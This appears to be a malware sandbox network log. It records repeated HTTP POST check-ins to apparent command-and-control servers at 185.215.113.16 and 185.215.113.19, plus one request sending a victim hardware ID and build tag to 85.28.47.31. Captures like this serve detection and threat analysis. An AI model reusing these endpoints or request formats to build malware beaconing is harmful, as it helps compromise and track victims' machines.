Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 31 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000017001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFBAKKFCBFHIIEBGIDBGHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 41 4b 4b 46 43 42 46 48 49 49 45 42 47 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 41 41 32 45 43 42 43 45 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 4b 4b 46 43 42 46 48 49 49 45 42 47 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 4b 4b 46 43 42 46 48 49 49 45 42 47 49 44 42 47 2d 2d 0d 0a Data Ascii: ------AFBAKKFCBFHIIEBGIDBGContent-Disposition: form-data; name="hwid"25AA2ECBCE684217651120------AFBAKKFCBFHIIEBGIDBGContent-Disposition: form-data; name="build"sila------AFBAKKFCBFHIIEBGIDBG--
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
